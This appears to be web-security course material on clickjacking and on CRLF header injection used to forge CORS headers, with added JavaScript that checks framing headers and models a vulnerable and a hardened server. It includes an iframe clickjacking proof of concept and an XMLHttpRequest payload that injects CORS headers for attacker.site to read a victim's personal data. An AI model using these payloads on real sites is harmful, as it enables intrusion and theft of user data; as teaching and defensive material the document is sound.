Other Attacks
Clickjacking
Feasibility study
The first step is to check whether the target page can be framed at all: load it inside an iframe on a page served from the attacker's origin and see whether it renders.
<html>
<body>
<iframe src="[TargetPage]"></iframe>
</body>
</html>
In the scenario above, the attacker's page looks exactly like the
original one, because it simply frames it. The attacker can now place
any transparent element above the page and lure the victim into
clicking what looks like a "visible" element; the click actually lands
on the transparent element on top.
The image in the next slide shows what happens.
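The feasibility test above is done by eye. The following is an added example, not code from the original slides: it makes the same decision from the target's response headers, so a framing check can be scripted against many pages. The header sets at the bottom are constructed samples, and the hostnames are taken from the slide's own examples.

```javascript
// Added example, not from the original slides: decide from a target's
// response headers whether a given attacker origin could frame the page.

// Pull the frame-ancestors source list out of a Content-Security-Policy
// value; null when the policy does not restrict framing at all.
function frameAncestors(csp) {
  if (!csp) return null;
  for (const directive of csp.split(";")) {
    const tokens = directive.trim().split(/\s+/);
    if (tokens[0].toLowerCase() === "frame-ancestors") {
      return tokens.slice(1).map(t => t.toLowerCase());
    }
  }
  return null;
}

// Does one frame-ancestors source expression match the framing origin?
// Handles 'self', '*', scheme-only sources, exact hosts and *.host wildcards.
function sourceMatches(src, framer, target) {
  if (src === "'self'") return framer.origin === target.origin;
  if (src === "*") return true;
  if (src === "http:" || src === "https:") return framer.protocol === src;
  const m = src.match(/^(?:(https?):\/\/)?(\*\.)?([^:\/]+)$/);
  if (!m) return false; // unsupported or malformed source: treat as no match
  const [, scheme, wildcard, host] = m;
  if (scheme && framer.protocol !== scheme + ":") return false;
  return wildcard ? framer.hostname.endsWith("." + host) : framer.hostname === host;
}

// Verdict: "frameable", "blocked" or "unknown".
// `headers` is a plain object keyed by lower-case header name.
function frameable(headers, attackerOrigin, targetUrl) {
  const framer = new URL(attackerOrigin);
  const target = new URL(targetUrl);
  const sources = frameAncestors(headers["content-security-policy"]);
  if (sources !== null) {
    // CSP frame-ancestors obsoletes X-Frame-Options: when both are present
    // the browser enforces the CSP directive and ignores X-Frame-Options.
    if (sources.length === 0 || sources.includes("'none'")) return "blocked";
    return sources.some(s => sourceMatches(s, framer, target)) ? "frameable" : "blocked";
  }
  const xfo = (headers["x-frame-options"] || "").trim().toUpperCase();
  if (xfo === "DENY") return "blocked";
  if (xfo === "SAMEORIGIN") return framer.origin === target.origin ? "frameable" : "blocked";
  if (xfo.startsWith("ALLOW-FROM")) return "unknown"; // obsolete value, browser support varies
  return "frameable"; // no framing restriction at all
}

// Constructed header sets, checked against the slide's hosts.
const ATTACKER = "http://www.attackersite.foo";
const TARGET = "http://www.voteforthecompanyoftheyear.foo/company?eLSFoo";

const samples = {
  noPolicy: {},
  xfoDeny: { "x-frame-options": "DENY" },
  xfoSameOrigin: { "x-frame-options": "SAMEORIGIN" },
  cspNone: { "content-security-policy": "default-src 'self'; frame-ancestors 'none'" },
  cspPartner: { "content-security-policy": "frame-ancestors 'self' https://*.partner.example" },
  cspOverridesXfo: { "x-frame-options": "DENY", "content-security-policy": "frame-ancestors *" },
};

// Verdict for every sample from the given framing origin.
function feasibility(attackerOrigin = ATTACKER, targetUrl = TARGET) {
  const out = {};
  for (const [name, headers] of Object.entries(samples)) {
    out[name] = frameable(headers, attackerOrigin, targetUrl);
  }
  return out;
}

console.log(feasibility());
```

In practice the headers would come from a real response to the target URL; only a page that comes back as "frameable" is worth building an overlay for. The "unknown" verdict for ALLOW-FROM is deliberate: that value was never supported consistently, so the answer has to be confirmed in the browsers that matter.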
This time we have set the opacity of the button to 0.2, so you can spot the difference.
A classic frame-busting script, placed in the target page, detects that it is not the top-level window and navigates the top window to itself:
<script>
if (top != window) {
  top.location = window.location;
}
</script>
Frame busting alone is unreliable: it only works if the framed page's JavaScript actually runs, and the framing page can interfere with it. The robust defense is a framing policy sent by the server (the X-Frame-Options header or a CSP frame-ancestors directive).
Figure (Example 1 and Example 2): the attacker's page www.attackersite.foo/clickjacking.html embeds, in an iframe, the target page www.voteforthecompanyoftheyear.foo/company?eLSFoo.
<script>
var xmlhttp = new XMLHttpRequest();
xmlhttp.withCredentials = true; // send the victim's cookies with the cross-origin request
xmlhttp.onload = function () { /* xmlhttp.responseText now holds the victim's data */ };
// The CR/LF pair (%0d%0a) in trackingUrl is reflected into a response header and
// breaks out of it, injecting permissive CORS headers for the attacker's origin.
xmlhttp.open("GET", "http://target.site/getPersonalData.php?trackingUrl=test%0d%0aAccess-Control-Allow-Origin:%20http://attacker.site%0d%0aAccess-Control-Allow-Credentials:%20true", true);
xmlhttp.send();
</script>
So the malicious page can read (and steal) all of the victim's
personal data.
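The request above only works because the server writes the trackingUrl value into a response header without checking it for line breaks. The following is an added example, not code from the original slides: a miniature model of that server side, with the vulnerable header construction beside a hardened one, and a small parser that shows what the browser ends up seeing. The header name X-Tracking-Url, the handler names and the JSON body are assumptions constructed for the demo.

```javascript
// Added example, not from the original slides: why %0d%0a in trackingUrl
// turns into extra CORS headers on the response, and how to refuse it.

const CRLF = "\r\n";

// Vulnerable handler: the untrusted value is concatenated straight into a
// header line, so CR/LF inside it terminates that header and starts new ones.
function buildResponseVulnerable(trackingUrl) {
  return [
    "HTTP/1.1 200 OK",
    "Content-Type: application/json",
    "X-Tracking-Url: " + trackingUrl, // injection point (header name is an assumption)
    "",
    JSON.stringify({ name: "Alice", email: "alice@example.invalid" }), // constructed body
  ].join(CRLF);
}

// Hardened handler: a header value must never contain CR or LF. Reject it
// rather than stripping it, so a tampered request stays visible in the logs.
function buildResponseSafe(trackingUrl) {
  if (/[\r\n]/.test(trackingUrl)) {
    throw new Error("trackingUrl contains CR/LF, refusing to set header");
  }
  return buildResponseVulnerable(trackingUrl); // same layout, value known to be clean
}

// Minimal response-header parser, roughly as a browser would read the bytes.
function parseHeaders(raw) {
  const head = raw.split(CRLF + CRLF)[0];
  const headers = {};
  for (const line of head.split(CRLF).slice(1)) { // skip the status line
    const i = line.indexOf(":");
    if (i > 0) headers[line.slice(0, i).trim().toLowerCase()] = line.slice(i + 1).trim();
  }
  return headers;
}

// The parameter value from the slide's request, decoded the way the server
// decodes its query string.
const PAYLOAD = decodeURIComponent(
  "test%0d%0aAccess-Control-Allow-Origin:%20http://attacker.site%0d%0aAccess-Control-Allow-Credentials:%20true"
);

// Run both handlers on the payload and report what the browser would see.
function demo() {
  const injected = parseHeaders(buildResponseVulnerable(PAYLOAD));
  let safe;
  try {
    buildResponseSafe(PAYLOAD);
    safe = "accepted";
  } catch (e) {
    safe = "rejected";
  }
  return { injected, safe };
}

console.log(demo());
```

With the vulnerable handler the parsed headers contain Access-Control-Allow-Origin: http://attacker.site and Access-Control-Allow-Credentials: true, which is exactly the pair a credentialed cross-origin XMLHttpRequest needs; with the hardened handler the request is refused. Mature runtimes already enforce this rule (PHP's header() refuses to send more than one header per call since 5.1.2, and Node's res.setHeader() throws on CR/LF in a value), so the bug usually lives in code that assembles headers by hand or in older stacks.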
<?php
// Redirect the client; the Location value needs a scheme, otherwise the
// browser resolves it relative to the current site instead of leaving it.
header("Location: http://elsfoo.com");
die();
?>